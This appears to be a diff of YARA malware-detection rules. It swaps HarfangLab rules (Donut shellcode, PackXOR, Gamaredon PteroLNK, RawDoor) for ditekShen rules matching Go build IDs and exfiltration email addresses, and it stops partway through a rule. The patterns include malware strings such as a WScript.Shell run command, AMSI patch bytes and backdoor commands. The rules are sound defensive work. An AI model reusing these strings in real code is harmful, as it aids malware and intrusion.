+rule DITEKSHEN_INDICATOR_KB_ID_Powershellcookiestealer
 {
 	meta:
-		description = "Matches the native Android library used in the SameCoin campaign"
-		author = "HarfangLab"
-		id = "9c77c26e-50f7-5ee4-bc6b-c0333e268b2c"
-		date = "2024-02-13"
-		modified = "2025-04-16"
-		reference = "TRR240201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L412-L432"
-		license_url = "N/A"
-		hash = "248054658277e6971eb0b29e2f44d7c3c8d7c5abc7eafd16a3df6c4ca555e817"
-		logic_hash = "2779664830df3b5be72b7fe7d4da3d27e2a86b289ee3974596abf1df12317cd8"
+		description = "Detects email accounts used for exfiltration observed in PowerShellCookieStealer"
+		author = "ditekShen"
+		id = "c2bbb9a8-3e4c-5676-9676-2708a196ef8d"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L706-L715"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "bd404e94939acb92dd56a7d2a1f7536bcb3f520ca1e9dc614b53828afbc6dac8"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		context = "file"
+		quality = 71
+		tags = ""
 
 	strings:
-		$native_export = "Java_com_example_exampleone_MainActivity_deleteInCHunks" ascii
-		$f1 = "_Z9chunkMainv" ascii
-		$f2 = "_Z18deleteFilesInChunkRKNSt6__" ascii
-		$f3 = "_Z18overwriteWithZerosPKc" ascii
-		$s1 = "/storage/emulated/0/" ascii
-		$s2 = "FileLister" ascii
-		$s3 = "Directory chunks deleted."
-		$s4 = "Current Chunk Size is:  %dl\n" ascii
+		$s1 = "senmn0w@gmail.com" ascii wide nocase
+		$s2 = "mohamed.trabelsi.ena2@gmail.com" ascii wide nocase
 
 	condition:
-		filesize < 500KB and uint32( 0 ) == 0x464C457F and ( $native_export or all of ( $f* ) or all of ( $s* ) )
+		any of them
 }
-rule HARFANGLAB_Supposed_Grasshopper_Downloader : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Zebrocy : FILE
 {
 	meta:
-		description = "Detects the Nim downloader from the Supposed Grasshopper campaign."
-		author = "HarfangLab"
-		id = "e53656b5-a1be-53f0-a4d4-908f24e08bd6"
-		date = "2024-06-20"
-		modified = "2025-04-16"
-		reference = "TRR240601"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L433-L448"
-		license_url = "N/A"
-		logic_hash = "93509319ab8028b0215fcfb81d1ff5d3d810922999f1dd8359b706a965221b2f"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "fc805e9d-47a0-5fcb-9b21-4806c13ab7b4"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1541-L1550"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "16b88460896012b42ca576995f5de98a7a9d2fcc53f8e148427bca31a883d19b"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "file,memory"
 
 	strings:
-		$pdb_path = "C:\\Users\\or\\Desktop\\nim-" ascii
-		$code = "helo.nim" ascii
-		$function_1 = "DownloadExecute" ascii fullword
-		$function_2 = "toByteSeq" ascii fullword
+		$s1 = "Go build ID: \"l6RAKXh3Wg1yzn63nita/b2_Y0DGY05NFWuZ_4gUT/H91sCRktnyyYVzECfvvA/l8f-yII0L_miSjIe-VQu\"" ascii
+		$s2 = "Go build ID: \"fiGGvLVFcvIhuJsSaail/jLt9TEPQiusg7IpRkp4H/hlcoXZIfsl1D4521LqEL/yL8dN86mCNc39WqQTgGn\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule HARFANGLAB_Donut_Shellcode : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gostealer : FILE
 {
 	meta:
-		description = "Detects Donut shellcode in memory."
-		author = "HarfangLab"
-		id = "54facb12-3f33-5430-b4bf-0d223dc2a413"
-		date = "2024-06-20"
-		modified = "2025-04-16"
-		reference = "TRR240601"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L449-L497"
-		license_url = "N/A"
-		logic_hash = "1bf4e253195e39cc0b3cf45797c35a9f06078350aa35e65d9d36adbcc09a150b"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "25c0eb8b-c69c-5f50-b622-daaa3c8c62a4"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1552-L1562"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "d548bc2580c8e8233a5fcdf85b947547c10f2c4d0056d14e990f30dd7b9a0672"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "memory"
 
 	strings:
-		$amsi_patch = { 48 8B 44 24 (28 | 30) 83 20 00 33 C0 C3 }
-		$wldp_patch = { 41 C7 00 01 00 00 00 33 C0 C3 }
-		$api_hashing = { 8B C2 C1 C9 08 41 03 C8 8B D3 41 33 C9 C1 CA 08 41 03 D1 41 C1 C0 03 41 33 D2 41 C1 C1 03 44 33 CA 44 33 C1 41 FF C2 41 8B DB 44 8B D8 41 83 FA 1B }
-		$loaded_dlls = "ole32;oleaut32;wininet;mscoree;shell32" ascii
-		$function_1 = "WldpQueryDynamicCodeTrust" ascii
-		$function_2 = "WldpIsClassInApprovedList" ascii
-		$function_3 = "AmsiInitialize" ascii
-		$function_4 = "AmsiScanBuffer" ascii
-		$function_5 = "AmsiScanString" ascii
+		$s1 = "Go build ID: \"xQV-b1Fr7d576TTTpbXi/gq4FgVQqMcg--9tmY13y/76rKNEUBENlDFDcecmm_/mbw17A_6WrROaNCYDEQF\"" ascii
+		$s2 = "Go build ID: \"x4VqrSSsx8iysxVdfB-z/gIF3p7SUxiZsVgTuq7bN/93XHuILGnGYq2L83fRpj/eoY6nTqwk1sdMHTaXzlw\"" ascii
+		$s3 = "Go build ID: \"BPRThIYWbHcZQQ4K1y2t/2mO0-FjLC50P0QZuMTgC/9i6TYw_akiEF9ZPN0s3p/s1XoqXr7EyXMDVw5TTP3\"" ascii
 
 	condition:
-		uint8( 0 ) == 0xE8 and ( ( #amsi_patch > 1 and $wldp_patch and $api_hashing ) or ( $loaded_dlls and all of ( $function_* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule HARFANGLAB_Muddywater_Ateraagent_Operators : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Goldenaxe : FILE
 {
 	meta:
-		description = "Detect Atera Agent abused by MuddyWater"
-		author = "HarfangLab"
-		id = "1494a0da-92de-5cfb-a870-325d02e2cdfb"
-		date = "2024-04-17"
-		modified = "2025-04-16"
-		reference = "TRR240402"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L498-L528"
-		license_url = "N/A"
-		hash = "9b49d6640f5f0f1d68f649252a96052f1d2e0822feadd7ebe3ab6a3cadd75985"
-		logic_hash = "63d5d3a6723191dccd20c8d9f25607df512b91f57ac891ef8c87b2dd107ee5a2"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "e734d5b4-2332-5b46-a05e-fb35134ea070"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1564-L1573"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "4ab9aeaa74530de4a62ddfa8d7e8607e455d0ba4330260037327bec6d8d7abab"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$s1 = "COMPANYID001Q3000009snPyIAIACCOUNTID"
-		$s2 = "COMPANYID001Q3000006FpmoIACACCOUNTID"
-		$s3 = "COMPANYID001Q3000008IyacIACACCOUNTID"
-		$s4 = "COMPANYID001Q3000009QoSEIA0ACCOUNTID"
-		$s5 = "COMPANYID001Q30000023c7iIAAACCOUNTID"
-		$s6 = "COMPANYID001Q3000008qXbDIAUACCOUNTID"
-		$s7 = "COMPANYID001Q3000008cfLjIAIACCOUNTID"
-		$s8 = "COMPANYID001Q3000007hJubIAEACCOUNTID"
-		$s9 = "COMPANYID001Q3000008ryO3IAIACCOUNTID"
-		$s10 = "COMPANYID001Q300000A5nnAIARACCOUNTID"
-		$s11 = "COMPANYID001Q3000008JfioIACACCOUNTID"
-		$s12 = "COMPANYID001Q300000BeUp3IAFACCOUNTID"
-		$s13 = "COMPANYID001Q3000005gMamIAEACCOUNTID"
-		$s15 = "mrrobertcornish@gmail.comINTEGRATORLOGINCOMPANYID"
-		$cert1 = { 0A 28 49 99 78 E5 89 8D F4 0A 23 8E B8 A5 52 E8 }
-		$cert2 = { 06 7F 60 47 95 66 24 A7 15 99 61 74 3D 81 94 93 }
+		$s1 = "Go build ID: \"BrJuyMRdiZ7pC9Cah0is/rbDB__hXWimivbSGiCLi/B35SPLQwHal3ccR2gXNx/hEmVzhJWWatsrKwnENh_\"" ascii
+		$s2 = "Go build ID: \"5bgieaBe9PcZCZf23WFp/bCZ0AUHYlqQmX8GJASV6/fGxRLMDDYrTm1jcLMt8j/Wof3n5634bwiwLHFKHTn\"" ascii
 
 	condition:
-		filesize > 1MB and filesize < 4MB and ( uint16be( 0 ) == 0xD0CF ) and any of ( $s* ) and any of ( $cert* )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule HARFANGLAB_Packxor : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nemty : FILE
 {
 	meta:
-		description = "Detection rule for PackXOR"
-		author = "Harfanglab"
-		id = "6b4b6d61-b698-5e15-90b1-de2bdb76e425"
-		date = "2024-08-05"
-		modified = "2025-04-16"
-		reference = "https://harfanglab.io/insidethelab/unpacking-packxor/"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L529-L668"
-		license_url = "N/A"
-		hash = "0506372e2c2b6646c539ac5a08265dd66d0da58a25545e444c25b9a02f8d9a44"
-		logic_hash = "ecc7e241f98da8bcd248493f6443676e4c1e516f1fd19f488a62acd314be1898"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "512fe910-e38c-513c-b678-a0592bdc4ae2"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1575-L1588"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "246766ab1d2871b5c22323f622d39ce9fa9b46a2d43bace122ed5549484f3aac"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$s_packer_xor = {
-            4? 63 [3]                       // movsxd  rax, dword [rsp+0x50 {var_78}]
-            4? 8b [2-6]                     // mov     rcx, qword [rsp+0xd0 {arg_8}]
-            4? 8b [2-6]                     // mov     rcx, qword [rcx+0x8]
-            4? 0? [2]                       // add     rax, qword [rcx+0x50]
-            4? 8d [5]                       // lea     rcx, [rel data_140003020]
-            0f (b6|b7) [1-5]                // movzx   eax, byte [rcx+rax]
-            0f (b6|b7) [1-5]                // movzx   ecx, byte [rel data_14002399c]
-            4? 8b [2-6]                     // mov     rdx, qword [rsp+0xd0 {arg_8}]
-            4? 8b [2-6]                     // mov     rdx, qword [rdx+0x8]
-            4? 0? [2]                       // add     rcx, qword [rdx+0x68]
-            0f (b6|b7) [1-5]                // movzx   ecx, cl
-            33 ??                           // xor     eax, ecx
-            4? 63 [3]                       // movsxd  rcx, dword [rsp+0x50 {var_78}]
-            4? 8b [2-6]                     // mov     rdx, qword [rsp+0xd0 {arg_8}]
-            4? 8b [2-6]                     // mov     rdx, qword [rdx+0x8]
-            4? 0? [2]                       // add     rcx, qword [rdx+0x48]
-            4? 8d [5]                       // lea     rdx, [rel data_140003020]
-            88 04 0a                        // mov     byte [rdx+rcx], al
-            0f (b6|b7)                      // movzx   eax, byte [rel data_14000301e]
-        }
-		$s_packer_decrypt_conf = {
-            8b [1-3]            // mov     eax, dword [rsp+0x4 {i}]
-            ff ??               // inc     eax
-            89 [1-3]            // mov     dword [rsp+0x4 {i}], eax
-            0f b6 [1-3]         // movzx   eax, byte [rsp {var_128}]
-            39 [1-3]            // cmp     dword [rsp+0x4 {i}], eax
-            73 ??               // jae     0x140001d59
-            8b [1-3]            // mov     eax, dword [rsp+0x4 {i}]
-            83 ?? 05            // add     eax, 0x5
-            8b ??               // mov     eax, eax
-            4? 8b [2-6]         // mov     rcx, qword [rsp+0x130 {arg_8}]
-            0f be [1-3]         // movsx   eax, byte [rcx+rax]
-            85 ??               // test    eax, eax
-            74 ??               // je      0x140001d40
-            0f b6 [1-3]         // movzx   eax, byte [rsp+0x2 {var_126}]
-            8b [3]              // mov     ecx, dword [rsp+0x4 {i}]
-            83 ?? 05            // add     ecx, 0x5
-            8b ??               // mov     ecx, ecx
-            4? 8b [4-6]         // mov     rdx, qword [rsp+0x130 {arg_8}]
-            0f (be|bf) [1-3]    // movsx   ecx, byte [rdx+rcx]
-            33 ??               // xor     eax, ecx
-            2b [1-3]            // sub     eax, dword [rsp+0x4 {i}]
-            ff ??               // dec     eax
-            8b [1-3]            // mov     ecx, dword [rsp+0x4 {i}]
-            88 [1-3]            // mov     byte [rsp+rcx+0x20 {var_108}], al
-            eb ??               // jmp     0x140001d57
-            b8 01 00 00 00      // mov     eax, 0x1
-            4? 6b ?? 00         // imul    rax, rax, 0x0
-            4? 8b [4-6]         // mov     rcx, qword [rsp+0x130 {arg_8}]
-            c6 [1-3] 00         // mov     byte [rcx+rax], 0x0
-            eb ??               // jmp     0x140001d59
-            eb                  // jmp     0x140001ce7
-        }
-		$s_packer_find_entry_point = {
-            4? 63 [1-4]             // movsxd  rax, dword [rsp {var_38_1}]
-            4? 3b [1-4]             // cmp     rax, qword [rsp+0x20 {var_18_1}]
-            73 ??                   // jae     0x140001c7f
-            48 8b [1-4]             // mov     rax, qword [rsp+0x10 {var_28_1}]
-            0f b7 [1-4]             // movzx   eax, word [rax]
-            c1 ?? 0c                // sar     eax, 0xc
-            83 ?? 0a                // cmp     eax, 0xa
-            75 ??                   // jne     0x140001c7d
-            4? 8b [1-4]             // mov     rax, qword [rsp+0x8 {var_30}]
-            8b [1-4]                // mov     eax, dword [rax]
-            4? 03 [1-4]             // add     rax, qword [rsp+0x40 {arg_8}]
-            4? 8b [1-4]             // mov     rcx, qword [rsp+0x10 {var_28_1}]
-            0f b7 [1-4]             // movzx   ecx, word [rcx]
-            81 ?? ff 0f 00 00       // and     ecx, 0xfff
-            4? 63 [1-4]             // movsxd  rcx, ecx
-            4? 03 [1-4]             // add     rax, rcx
-            4? 89 [1-4]             // mov     qword [rsp+0x18 {var_20_1}], rax
-            4? 8b [1-4]             // mov     rax, qword [rsp+0x18 {var_20_1}]
-            4? 8b [1-4]             // mov     rax, qword [rax]
-            4? 03 [1-4]             // add     rax, qword [rsp+0x50 {arg_18}]
-            4? 8b [1-4]             // mov     rcx, qword [rsp+0x18 {var_20_1}]
-            4? 89 [1-4]             // mov     qword [rcx], rax
-            eb 93                   // jmp     0x140001c12
-        }
-		$s_packer_find_entry_point_rtlcreateuserthtread = {
-            4? 8b [1-4]                // mov     rax, qword [rsp+0x70 {var_58_1}]
-            8b [1-4]                   // mov     eax, dword [rax+0x28]
-            4? 03 [1-4]                // add     rax, qword [rsp+0x68 {var_60_1}]
-            4? 89 [2-6]                // mov     qword [rsp+0x88 {var_40_1}], rax
-            ff [2-6]                   // call    qword [rsp+0x88 {var_40_1}]
-            4? 8d [2-6]                // lea     rax, [rsp+0x9c {var_2c}]
-            4? 89 [1-4]                // mov     qword [rsp+0x48 {var_80_1}], rax {var_2c}
-            4? 8d [2-6]                // lea     rax, [rsp+0xb8 {var_10}]
-            4? 89 [1-4]                // mov     qword [rsp+0x40 {var_88_1}], rax {var_10}
-            4? c7 [3-7]                // mov     qword [rsp+0x38 {var_90}], 0x0
-            4? 8b [2-6]                // mov     rax, qword [rsp+0x88 {var_40_1}]
-            4? 89 [1-4]                // mov     qword [rsp+0x30 {var_98_1}], rax
-            4? c7 [3-7]                // mov     qword [rsp+0x28 {var_a0}], 0x0
-            4? c7 [3-7 ]               // mov     qword [rsp+0x20 {var_a8}], 0x0
-            4? 33 ??                   // xor     r9d, r9d  {0x0}
-            4? ?? 01                   // mov     r8b, 0x1
-            33 ??                      // xor     edx, edx  {0x0}
-            4? c? ?? ff ff ff ff       // mov     rcx, 0xffffffffffffffff
-            ff                         // call    qword [rsp+0xa0 {var_28_1}]
-        }
-		$s_packer_string_encryption = {
-            0f B? [1-2]      // movzx   eax, [rsp+128h+size_string]
-            39 [1-3]         // cmp     [rsp+128h+var_124], eax
-            73 ??            // jnb     short loc_140001CC9
-            8B [1-3]         // mov     eax, [rsp+128h+var_124]
-            83 ?? 05         // add     eax, 5
-            8B ??            // mov     eax, eax
-            4? 8B [1-6]      // mov     rcx, [rsp+128h+arg_0]
-            0F B? [1-2]      // movsx   eax, byte ptr [rcx+rax]
-            85 ??            // test    eax, eax
-            74 ??            // jz      short loc_140001CB0
-            0f B? [1-3]      // movzx   eax, [rsp+128h+key]
-            8B [1-3]         // mov     ecx, [rsp+128h+var_124]
-            83 ?? 05         // add     ecx, 5
-            8B ??            // mov     ecx, ecx
-            4? 8B [1-6]      // mov     rdx, [rsp+128h+arg_0]
-            0F B? [1-2]      // movsx   ecx, byte ptr [rdx+rcx]
-            33 ??            // xor     eax, ecx
-            2B [1-3]         // sub     eax, [rsp+128h+var_124]
-            FF ??            // dec     eax
-            8B [1-3]         // mov     ecx, [rsp+128h+var_124]
-            88 [1-3]         // mov     [rsp+rcx+128h+decrypted_string], al
-            EB               // jmp     short loc_140001CC7
-        }
+		$s1 = "Go build ID: \"R6dvaUktgv2SjVXDoMdo/kKgwagwoLRC88DpIXAmx/eipNq7_PQCTCOhZ6Q74q/RHJkCaNdTbd6qgYiA-EC\"" ascii
+		$s2 = "Go build ID: \"vsdndTwlj03gbEoDu06S/anJkXGh7N08537M0RMms/VG58d99axcdeD_z1JIko/tfDVbCdWUId-VX90kuT7\"" ascii
+		$s3 = "Go build ID: \"FG9JEesXBQ04oNCv2bIS/MmjCdGa3ogU_6DIz6bZR/AjrqKBSezDfY1t7U9xr-/-06dIpZsukiVcN0PtOCb\"" ascii
+		$s4 = "Go build ID: \"MJ8bS1emWrrlXiE_C61E/A6GaZzhLls_pFKMGfU1H/ZgswGQy_lzK-I4cZykwm/8JzjhV06jZosSa5Qih5O\"" ascii
+		$s5 = "Go build ID: \"_vQalVQKn2O8kxxA4vVM/slXlklhnjEF5tawjlPzW/t26rDRURK6ii0MqU7gIx/MNq6vj_uM15RhjVC2QuX\"" ascii
+		$s6 = "Go build ID: \"KWssFDTp6mq16xlI5c0t/mQLgof0oyp-eYKqNYUFL/Np8S71zE5W5_BsJCpjsj/hXpFDaVCtay2509R05fd\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 20MB and 2 of ( $s_packer* )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule HARFANGLAB_Gamaredon_Pterolnk_Vbscript : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Qnapcrypt : FILE
 {
 	meta:
-		description = "Matches Gamaredon PteroLNK VBScript samples used in late 2024 to early 2025"
-		author = "HarfangLab"
-		id = "3781749e-7f4e-55db-bdf7-2a0a056f41f4"
-		date = "2025-04-04"
-		modified = "2025-04-16"
-		reference = "TRR250401"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L669-L688"
-		license_url = "N/A"
-		hash = "d5538812b9a41b90fb9e7d83f2970f947b1e92cb68085e6d896b97ce8ebff705"
-		logic_hash = "b6aad0ca4653c111a4f481f9d4636e272712dc7ad53fa3b2041f2c47a1eee527"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "4cdea15f-d8fd-5720-ba25-eb60e9b0f9ce"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1590-L1598"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "b3ee583c395701350c091041a72f988d1b5ae607b642b42152fcda29f9be63e2"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$vbs = "on error resume next" ascii wide
-		$a1 = "=\"b24gZXJyb3IgcmVzdW1lIG5leHQNC" ascii wide
-		$b1 = "\"\"%PUBLIC%\"\"" ascii wide
-		$b2 = "\"\"%APPDATA%\"\"" ascii wide
-		$b3 = "\"\"REG_DWORD\"\"" ascii wide
+		$s1 = "Go build ID: \"XcBqbQohm7UevdYNABvs/2RcJz1616naXSRu2xvTX/b6F3Jt1-5WAIexSyzeun/MpHqs5fJA5G2D9gVuUCe\"" ascii
 
 	condition:
-		filesize < 400KB and $vbs in ( 0 .. 2 ) and $a1 and 1 of ( $b* )
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule HARFANGLAB_Gamaredon_Pterolnk_LNK : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Snatch : FILE
 {
 	meta:
-		description = "Matches Gamaredon PteroLNK-generated LNK files used in late 2024 to early 2025"
-		author = "HarfangLab"
-		id = "e6e0c2cb-049a-5d80-b167-56079aefe38b"
-		date = "2025-04-04"
-		modified = "2025-04-16"
-		reference = "TRR250401"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L689-L707"
-		license_url = "N/A"
-		hash = "n/a"
-		logic_hash = "69565365da1632407e223f87978a91543b1281879aa372cd055d08e26e1a2d93"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "6ab6b7bc-c905-5ff9-8059-a2d512ba13b3"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1600-L1610"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "5a19c791ed0d829c4c97e35cfa604a8716bad3f02632712903d765db95ba87f6"
 		score = 75
-		quality = 78
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$a1 = "javascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"wscript.exe //e:vb\"\"+\"\"Script" ascii wide
-		$a2 = "javascript:eval('w=new%20ActiveXObject(\\\"\"WScript.Shell\\\"\");w.run(\\\"\"explorer" ascii wide
-		$b1 = "\"\");window.close()')" ascii wide nocase
+		$s1 = "Go build ID: \"8C2VvDTH-MuUPx8tL42E/PWF9iuE2j_Zt0ANsTlty/c64swZ5TtuaIpHuEFmga/6sS0KWNryc-YAduDnWWO\"" ascii
+		$s2 = "Go build ID: \"UBrfJ_wztDfCHWakqvlV/LhzfkJwvKFrNhKCHtU9_/sveCupt8GVbvu6WZiyA-/GcimfL_TPl6FTPPriBDr\"" ascii
+		$s3 = "Go build ID: \"5zCy9jt7UZaIs5YPk4tt/1Yt6v7gCpDG---pRFyW-/7729nLSeKJik31ftz_Ve/Z5EVG3lWak3ynxNrJ4ih\"" ascii
 
 	condition:
-		filesize < 10KB and uint32( 0 ) == 0x0000004C and uint32( 4 ) == 0x00021401 and 1 of ( $a* ) and $b1
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule HARFANGLAB_Apt31_Rawdoor_Dropper : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Godownloader : FILE
 {
 	meta:
-		description = "Matches the RawDoor dropper"
-		author = "HarfangLab"
-		id = "b278a157-20e2-5271-aca0-0692929b881d"
-		date = "2024-04-12"
-		modified = "2025-04-16"
-		reference = "TRR240401"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L708-L729"
-		license_url = "N/A"
-		hash = "c3056e39f894ff73bba528faac04a1fc86deeec57641ad882000d7d40e5874be"
-		logic_hash = "d0cbe02c4fafb4895bd0126d2496802a3fee6a0362e55bfa91cfd1c75043d94a"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "da53c062-4a55-543d-b2b6-52acdf13febc"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1612-L1622"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "e0f5ee6ade4608a8b5c5bd02bf5aef0fcb9cb1fe1cc3a9d00b1ace91e5d0d33f"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$service_target = "%SystemRoot%\\system32\\svchost.exe -k netsvcs" ascii
-		$service_dispname = "Microsoft .NET Framework NGEN" ascii
-		$drop_name = "~DF313.msi" ascii
-		$msg1 = "RegOpenKeyEx %s  error:%d\x0D\x0A" ascii
-		$msg2 = "RegDeleteValue Wow64 . %d\x0D\x0A" ascii
-		$msg3 = "CreateService %s success! but Start Faile.. %d\x0D\x0A" ascii
-		$msg4 = "OutResFile to %s%s False!" ascii
-		$msg5 = "Can't GetNetSvcs Buffer!" ascii
+		$s1 = "Go build ID: \"1OzJqWaH4h1VtrLP-zk8/G9w32ha7_ziW1Fa-0Byj/gLtfhbXZ6i_W0e5e_tFF/ekG0n9hOcZjmwzRQnRqC\"" ascii
+		$s2 = "Go build ID: \"kKxyj14l4NhGbuhOgzef/ab_yr_pUn6q2idYdoBhn/hFAjO_Yxc_rN6mHFuHM9/SmS3qmOyJBc_4xV_qg3B\"" ascii
+		$s3 = "Go build ID: \"MiW7XJnQsBXxlBHro8GW/HMqQknRgJg-mCXomgFRt/88ccKMrfA_s6AcOJs3aM/jSUAU_l3RrMzlV6ANEYE\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 350KB and filesize < 600KB and ( ( $service_target and $service_dispname and $drop_name ) or 3 of ( $msg* ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule HARFANGLAB_Apt31_Rawdoor_Payload : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Ranumbot : FILE
 {
 	meta:
-		description = "Matches the RawDoor payload"
-		author = "HarfangLab"
-		id = "5fef27fe-a2ea-56b4-8cf6-8f6c4bf85d80"
-		date = "2024-04-12"
-		modified = "2025-04-16"
-		reference = "TRR240401"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L730-L754"
-		license_url = "N/A"
-		hash = "fade96ec359474962f2167744ca8c55ab4e6d0700faa142b3d95ec3f4765023b"
-		logic_hash = "51bd04603419d5bc77f12618df986f6b31ea8ddea553c6bc7580698fa236b3ed"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "f368cd9d-f974-56cf-a2b5-bd300f30cedc"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1624-L1633"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "c3d0ba55ca2be1b11ebf1b82490c5d26f2b35958b31a7e55892e27f24bf4118f"
 		score = 75
-		quality = 55
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$name = "\x0D\x0A=================RawDoor %g================\x0D\x0A" ascii
-		$key = /SOFTWARE\\Clients\\Netra(u|w)/ ascii
-		$cmd1 = "Shell <powershell.exe path>" ascii
-		$cmd2 = "Selfcmd <self cmd string>" ascii
